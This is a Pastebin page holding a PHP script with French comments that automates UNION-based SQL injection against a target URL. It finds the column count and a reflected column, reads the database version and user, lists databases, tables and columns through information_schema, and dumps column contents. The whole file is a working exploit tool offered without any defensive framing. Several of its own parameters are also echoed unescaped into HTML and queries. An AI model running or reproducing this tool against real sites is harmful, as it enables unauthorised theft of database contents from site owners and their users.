Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ##############################
- # Fonctions de requettes SQL #
- # Coder par Hypnoze57 #
- ##############################
- #Recherche du nombre de colonne;
- function nb_col($url) {
- for($i=1;$i<=50;$i++) {
- $page = file_get_contents($url . '+OrDeR+bY+' . $i . '--+-');
- if(preg_match("#Unknown column|on line|Warning MySQL#", $page)) {
- $col_nb = $i -1;
- break;
- }
- }
- return $col_nb;
- }
- #Première injection;
- function injection($url, $nb_col) {
- $chaine = '';
- for($i=1;$i<=$nb_col;$i++) {
- $chaine .= $i.',';
- }
- $chaine = substr($chaine, 0, -1);
- $url .= '+UniOn+SeLecT+'.$chaine.'--+-';
- return $url;
- }
- #Recherche de la colonne vulnérable;
- function string_col($url, $nb_col) {
- for($i=1;$i<=$nb_col;$i++) {
- $str = str_replace(','.$i.',', ',0x4879706E6F7A653537,', $url);
- $page = file_get_contents($str);
- if(preg_match("#Hypnoze57#", $page)) {
- $str_col = $i;
- break;
- }
- }
- return $str_col;
- }
- #Recherche de l'user et de la version de la bdd;
- function find_vers_user($url, $str_col) {
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,VerSion(),0x3A2F6835373A),', $url);
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $version);
- $url = str_replace('VerSion()', 'UseR()', $url);
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57#', $pg, $user);
- echo 'Version : <font color="red">'.$version[1].'</font><br />User : <font color="red">'.$user[1].'</font><br /><br />';
- }
- #Recherche des bases de données;
- function find_db($url, $str_col, $url_dep) {
- $db = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,SchEmA_NamE,0x3A2F6835373A),', $url);
- $db = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.SchEmAta--+-', $db);
- $page = file_get_contents($db);
- $page = str_replace(',', '', $page);
- preg_match('#:h57:(.*):/h57:#', $page, $db_name);
- $bdd = explode(':/h57::h57:', $db_name[1]);
- foreach ($bdd as $base) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$base.'">'.$base.'</a><br />';
- }
- }
- #Recherche des tables;
- function find_tbl($url, $str_col, $url_dep) {
- if(isset($_GET['db'])) {
- echo '<br /><u>Tables de la base '.$_GET['db'].' : </u><br /><br />';
- $tbl = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,TabLe_NaMe,0x3A2F6835373A),', $url);
- $db = str2hex($_GET['db']);
- $bd = $_GET['db'];
- $tbl = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.TabLes+where+TabLe_SchEmA='.$db.'--+-', $tbl);
- $page = file_get_contents($tbl);
- preg_match('#:h57:(.*):/h57:#', $page, $tbl_name);
- $tables = explode(':/h57:,:h57:', $tbl_name[1]);
- foreach($tables as $tbl_fin) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$bd.'&tbl='.$tbl_fin.'">'.$tbl_fin.'</a><br />';
- }
- }
- }
- #Recherche des colonnes;
- function find_col($url, $str_col, $url_dep) {
- if(isset($_GET['tbl'])) {
- echo '<br /><u>Colonnes de la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
- $db = str2hex($_GET['db']);
- $tbl = str2hex($_GET['tbl']);
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,column_name,0x3A2F6835373A),', $url);
- $url = str_replace('--+-', '+FroM+iNForMaTion_ScheMa.columNs+WhErE+tablE_scheMa='.$db.'+AnD+TablE_nAme='.$tbl.'--+-', $url);
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $col_name);
- $colonne = explode(':/h57:,:h57:', $col_name[1]);
- foreach($colonne as $col_fin) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$_GET['db'].'&tbl='.$_GET['tbl'].'&col='.$col_fin.'">'.$col_fin.'</a><br />';
- }
- }
- }
- #Recherche du contenu;
- function find_content($url, $str_col, $url_dep) {
- if(isset($_GET['col'])) {
- echo '<br /><u>Contenu de la colonne '.htmlspecialchars($_GET['col']).' dans la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,'.$_GET['col'].',0x3A2F6835373A),', $url);
- $url = str_replace('--+-', '+FroM+'.$_GET['db'].'.'.$_GET['tbl'].'--+-', $url);
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $content);
- $contents = explode(':/h57:,:h57:', $content[1]);
- foreach($contents as $content_fin) {
- echo '<font color="red">'.$content_fin.'</font><br />';
- }
- }
- }
- #Fonction de conversion de table (exemple : admin = 0x61646d696e) - fonction coder par Luxerails;
- function str2hex($str) {
- $strout = '0x';
- for ($i=0; $i < strlen($str); $i++) {
- $strout .= dechex(ord($str{$i}));
- }
- return $strout;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement